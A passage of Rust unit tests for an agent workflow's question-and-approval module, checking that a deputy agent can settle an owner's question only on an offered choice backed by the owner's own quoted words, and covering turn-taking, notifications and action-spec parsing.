2848 dep.seat = Some(crate::agent::SeatState::new("deputy-x", "alpha", 1));
2849 q.deputy = Some(dep);
2850 q.say("たぶんマージでいい。残りの指摘はフォローアップに積んで")
2851 .unwrap();
2852 assert!(
2853 q.settle_by_deputy("deputy-x", "merge", "たぶんマージでいい")
2854 .is_err()
2855 );
2856 q.reply("merge?", vec!["merge".into(), "hold".into()])
2857 .unwrap();
2858 q.say("マージしていいよ。残りのレビュー指摘はフォローアップタスクとして積んで")
2859 .unwrap();
2860 assert!(
2861 q.settle_by_deputy("deputy-x", "merge", "どこかの言葉")
2862 .is_err(),
2863 "the quote must be the owner's"
2864 );
2865 assert!(
2866 q.settle_by_deputy("deputy-x", "hold", "マージしていいよ")
2867 .is_err(),
2868 "`hold` still needs the whole message"
2869 );
2870 q.settle_by_deputy("deputy-x", "merge", "マージしていいよ")
2871 .unwrap();
2872 assert_eq!(q.resolution().as_deref(), Some("merge"));
2873 }
2874
2875 #[test]
2876 fn a_later_owner_message_supersedes_an_earlier_merge() {
2877 let mut q = Question::new(
2878 "run".into(),
2879 crate::land::APPROVAL_NODE.into(),
2880 "land".into(),
2881 "Merge?".into(),
2882 String::new(),
2883 vec!["merge".into(), "hold".into()],
2884 );
2885 let mut dep = Deputy::new("brief".into());
2886 dep.seat = Some(crate::agent::SeatState::new("deputy-x", "alpha", 1));
2887 q.deputy = Some(dep);
2888 q.say("merge").unwrap();
2889 q.reply("sure?", vec!["merge".into(), "hold".into()])
2890 .unwrap();
2891 q.say("wait, don't merge").unwrap();
2892 assert!(q.settle_by_deputy("deputy-x", "merge", "merge").is_err());
2893 assert_eq!(q.status, QuestionStatus::Open);
2894 }
2895
2896 #[test]
2897 fn a_deputy_settles_only_on_an_offered_choice_and_the_owners_own_words() {
2898 let mut q = Question::new(
2899 "task".to_owned(),
2900 "conduct".to_owned(),
2901 "conduct".to_owned(),
2902 "Done?".to_owned(),
2903 String::new(),
2904 vec!["yes".to_owned(), "no".to_owned()],
2905 );
2906 let mut seat = crate::agent::SeatState::new("deputy-x", "alpha", 1);
2907 seat.turns = 1;
2908 let mut dep = Deputy::new("brief".to_owned());
2909 dep.seat = Some(seat);
2910 q.deputy = Some(dep);
2911 q.say("setup done, go ahead").unwrap();
2912
2913 assert!(
2914 q.settle_by_deputy("someone-else", "yes", "setup done")
2915 .is_err()
2916 );
2917 assert!(
2918 q.settle_by_deputy("deputy-x", "maybe", "setup done")
2919 .is_err()
2920 );
2921 assert!(
2922 q.settle_by_deputy("deputy-x", "yes", "never said this")
2923 .is_err()
2924 );
2925 assert!(q.settle_by_deputy("deputy-x", "yes", " ").is_err());
2926 assert_eq!(q.status, QuestionStatus::Open);
2927
2928 q.settle_by_deputy("deputy-x", "yes", "setup done").unwrap();
2929 assert_eq!(q.status, QuestionStatus::Answered);
2930 assert_eq!(q.resolution().as_deref(), Some("yes"));
2931 let last = q.thread.last().unwrap();
2932 assert_eq!(last.who, Who::Agent);
2933 assert!(
2934 last.body.contains("setup done"),
2935 "the quote stays on the record"
2936 );
2937 }
2938
2939 #[test]
2940 fn a_question_written_before_deputies_still_reads() {
2941 let mut q = Question::new(
2942 "task".to_owned(),
2943 "conduct".to_owned(),
2944 "conduct".to_owned(),
2945 "Done?".to_owned(),
2946 String::new(),
2947 Vec::new(),
2948 );
2949 q.schema = 4;
2950 let mut v = serde_json::to_value(&q).unwrap();
2951 v.as_object_mut().unwrap().remove("deputy");
2952 let back: Question = serde_json::from_value(v).unwrap();
2953 assert!(back.deputy.is_none());
2954 }
2955
2956 #[test]
2957 fn saying_something_appends_an_operator_turn_without_deciding_anything() {
2958 let mut q = choice_question();
2959 q.say("does the cache need eviction?").unwrap();
2960 assert_eq!(q.thread.len(), 1);
2961 assert_eq!(q.thread[0].who, Who::Operator);
2962 assert_eq!(q.thread[0].body, "does the cache need eviction?");
2963 assert_eq!(q.status, QuestionStatus::Open);
2966 assert!(q.answer.is_none());
2967 assert!(q.waiting_on_agent(), "the ball is now in the agent's court");
2968 }
2969
2970 #[test]
2971 fn saying_and_replying_are_refused_on_a_settled_question_and_on_empty_text() {
2972 let mut answered = choice_question();
2973 answered
2974 .answer(Answer::Choice("SQLite".to_owned()))
2975 .unwrap();
2976 let a = answered.say("still there?").unwrap_err().to_string();
2977 assert!(a.contains("already answered"), "{a}");
2978 let b = answered
2979 .reply("still there?", vec![])
2980 .unwrap_err()
2981 .to_string();
2982 assert!(b.contains("already answered"), "{b}");
2983
2984 let mut abandoned = choice_question();
2985 abandoned.abandon("timed out");
2986 let c = abandoned.say("hello?").unwrap_err().to_string();
2987 assert!(c.contains("abandoned"), "{c}");
2988
2989 let mut open = choice_question();
2990 let d = open.say(" ").unwrap_err().to_string();
2991 assert!(d.contains("empty"), "{d}");
2992 let e = open.reply(" \n", vec![]).unwrap_err().to_string();
2993 assert!(e.contains("empty"), "{e}");
2994 assert!(open.thread.is_empty(), "a refused turn leaves no trace");
2995 }
2996
2997 #[test]
2998 fn a_reply_replaces_the_choices_and_moves_the_ball_back_to_the_owner() {
2999 let mut q = choice_question();
3000 q.say("SQLite or Redis, but what about disk space?")
3001 .unwrap();
3002 assert!(q.waiting_on_agent());
3003
3004 q.reply(
3005 "SQLite: it is one file, no server to run.",
3006 vec!["SQLite".to_owned()],
3007 )
3008 .unwrap();
3009
3010 assert_eq!(q.choices, ["SQLite"]);
3011 assert!(
3012 !q.waiting_on_agent(),
3013 "the agent spoke, so the owner is the one being waited on now"
3014 );
3015 assert_eq!(q.thread.len(), 2);
3016 assert_eq!(q.thread[1].who, Who::Agent);
3017
3018 assert!(q.answer(Answer::Choice("Redis".to_owned())).is_err());
3020 q.answer(Answer::Choice("SQLite".to_owned())).unwrap();
3021 assert_eq!(q.resolution().as_deref(), Some("SQLite"));
3022 }
3023
3024 #[test]
3025 fn notification_fires_for_the_first_ask_and_only_after_the_quiet_window_on_a_reply() {
3026 let mut fresh = choice_question();
3027 assert!(
3028 fresh.should_notify(Timestamp::now()),
3029 "nobody has been notified yet, so the first ask always pages"
3030 );
3031
3032 fresh.say("why not Postgres?").unwrap();
3033 let just_said = fresh.thread[0].at;
3034 assert!(
3035 !fresh.should_notify(just_said + jiff::SignedDuration::from_secs(60)),
3036 "still on the screen a minute later; no need to page again"
3037 );
3038 assert!(
3039 !fresh.should_notify(just_said + jiff::SignedDuration::from_secs(300)),
3040 "exactly the window: `>` means this side stays quiet"
3041 );
3042 assert!(
3043 fresh.should_notify(just_said + jiff::SignedDuration::from_secs(301)),
3044 "past the window: they may have walked away"
3045 );
3046 }
3047
3048 #[test]
3049 fn a_round_trip_of_turns_still_counts_as_one_open_question() {
3050 let (_dir, s) = store();
3051 let mut q = choice_question();
3052 s.put(&mut q).unwrap();
3053 q.say("why not Postgres?").unwrap();
3054 s.put(&mut q).unwrap();
3055 q.reply("no server to run", vec!["SQLite".to_owned()])
3056 .unwrap();
3057 s.put(&mut q).unwrap();
3058
3059 assert_eq!(
3060 s.count_open(),
3061 1,
3062 "one question that talked twice is still one open question"
3063 );
3064 assert_eq!(s.open_for(&q.run).len(), 1);
3065 }
3066
3067 #[tokio::test]
3068 async fn the_wait_returns_to_the_caller_when_the_owner_talks_back_without_deciding() {
3069 let (dir, s) = store();
3070 let mut q = choice_question();
3071 let id = q.id.clone();
3072 let writer = Questions::at(dir.path().join("questions"));
3073 let handle = tokio::spawn(async move {
3074 tokio::time::sleep(Duration::from_millis(30)).await;
3075 let mut fresh = writer.get(&id).expect("the question was filed first");
3076 fresh.say("why not Postgres?").unwrap();
3077 writer.put(&mut fresh).unwrap();
3078 });
3079
3080 let got = wait_for_owner(
3081 &mut q,
3082 &s,
3083 &quiet(),
3084 Duration::from_secs(5),
3085 Duration::from_millis(10),
3086 )
3087 .await
3088 .unwrap();
3089
3090 handle.await.unwrap();
3091 assert_eq!(got, Wait::Replied("why not Postgres?".to_owned()));
3092 assert_eq!(
3093 q.status,
3094 QuestionStatus::Open,
3095 "talking back is not a decision; the question stays open"
3096 );
3097 assert!(q.answer.is_none());
3098 }
3099
3100 #[test]
3101 fn a_say_that_lands_before_the_agents_reply_stays_unread() {
3102 let mut q = choice_question();
3103 q.say("A").unwrap();
3104 q.delivered_turns = q.thread.len();
3105 q.say("B").unwrap();
3106 q.reply("about A", vec![]).unwrap();
3107 assert_eq!(q.unread_from_owner().as_deref(), Some("B"));
3108 q.delivered_turns = q.thread.len();
3109 assert_eq!(q.unread_from_owner(), None);
3110 }
3111
3112 #[test]
3113 fn a_say_before_the_answer_is_handed_over_ahead_of_it() {
3114 let (_d, s) = store();
3115 let mut q = choice_question();
3116 s.put(&mut q).unwrap();
3117 q.say("first").unwrap();
3118 q.say("second").unwrap();
3119 q.answer(Answer::Choice("SQLite".to_owned())).unwrap();
3120 s.put(&mut q).unwrap();
3121 assert_eq!(q.unread_from_owner(), None, "closed: the guard stays");
3122 let mut out = Vec::new();
3123 deliver_answer(&s, &mut q, "SQLite", &mut out).unwrap();
3124 let shown = String::from_utf8(out).unwrap();
3125 let (a, b, c) = (
3126 shown.find("first").unwrap(),
3127 shown.find("second").unwrap(),
3128 shown.find("SQLite").unwrap(),
3129 );
3130 assert!(a < b && b < c, "{shown}");
3131 assert_eq!(q.delivered_turns, q.thread.len());
3132 assert!(q.answer_delivered);
3133 }
3134
3135 #[test]
3136 fn an_answer_alone_is_unchanged_and_delivered_says_are_not_repeated() {
3137 let mut q = choice_question();
3138 q.answer(Answer::Choice("SQLite".to_owned())).unwrap();
3139 assert_eq!(answer_for_agent(&q, "SQLite"), "SQLite");
3140 let mut q = choice_question();
3141 q.say("old").unwrap();
3142 q.delivered_turns = q.thread.len();
3143 q.say("new").unwrap();
3144 q.answer(Answer::Choice("SQLite".to_owned())).unwrap();
3145 let shown = answer_for_agent(&q, "SQLite");
3146 assert!(shown.contains("new") && !shown.contains("old"), "{shown}");
3147 }
3148
3149 #[test]
3150 fn action_specs_parse_strictly_and_must_name_an_offered_choice() {
3151 let choices = vec!["resume で続行する".to_owned(), "wait".to_owned()];
3152 let ok = parse_actions(
3153 &[
3154 "resume で続行する=resume".to_owned(),
3155 "wait=done".to_owned(),
3156 ],
3157 &choices,
3158 "run-1",
3159 )
3160 .unwrap();
3161 assert_eq!(
3162 ok["resume で続行する"],
3163 ChoiceAction::Resume {
3164 run: "run-1".into()
3165 }
3166 );
3167 assert_eq!(ok["wait"], ChoiceAction::Done);
3168
3169 let named = ChoiceAction::parse("x=resume:abcd", "").unwrap();
3170 assert_eq!(named.1, ChoiceAction::Resume { run: "abcd".into() });
3171 assert_eq!(
3172 ChoiceAction::parse("x=requeue", "").unwrap().1,
3173 ChoiceAction::Requeue
3174 );
3175
3176 for bad in [
3177 "no-equals",
3178 "=done",
3179 "x=resume",
3180 "x=resume:",
3181 "x=explode",
3182 "x=done:1",
3183 ] {
3184 assert!(ChoiceAction::parse(bad, "").is_err(), "{bad}");
3185 }
3186 assert!(parse_actions(&["ghost=done".to_owned()], &choices, "").is_err());
3187 assert!(
3188 parse_actions(
3189 &["wait=done".to_owned(), "wait=requeue".to_owned()],
3190 &choices,
3191 ""
3192 )
3193 .is_err()
3194 );
3195 }
3196
3197 #[test]
3198 fn only_a_chosen_label_with_an_action_is_actionable() {
3199 let mut q = choice_question();
3200 q.choices = vec!["resume".to_owned(), "SQLite".to_owned()];
3201 q.actions.insert("SQLite".to_owned(), ChoiceAction::Requeue);
3202 assert!(q.chosen_action().is_none(), "unanswered");
3203 q.answer(Answer::Choice("resume".to_owned())).unwrap();
3204 assert!(
3205 q.chosen_action().is_none(),
3206 "a label that merely reads like an action does nothing"
3207 );
3208
3209 let mut q2 = choice_question();
3210 q2.choices = vec!["SQLite".to_owned()];
3211 q2.actions
3212 .insert("SQLite".to_owned(), ChoiceAction::Requeue);
3213 q2.answer(Answer::Choice("SQLite".to_owned())).unwrap();
3214 assert_eq!(q2.chosen_action(), Some(&ChoiceAction::Requeue));
3215 }
3216
3217 #[test]
3218 fn a_reply_drops_actions_whose_choice_is_gone_and_old_files_read_without_actions() {
3219 let mut q = choice_question();
3220 q.choices = vec!["A".to_owned(), "B".to_owned()];
3221 q.actions.insert("A".to_owned(), ChoiceAction::Done);
3222 q.actions.insert("B".to_owned(), ChoiceAction::Requeue);
3223 q.reply("narrowing", vec!["B".to_owned()]).unwrap();
3224 assert_eq!(q.actions.len(), 1);
3225 assert!(q.actions.contains_key("B"));
3226
3227 let mut v = serde_json::to_value(&q).unwrap();
3228 v.as_object_mut().unwrap().remove("actions");
3229 let old: Question = serde_json::from_value(v).unwrap();
3230 assert!(old.actions.is_empty());
3231 }
3232}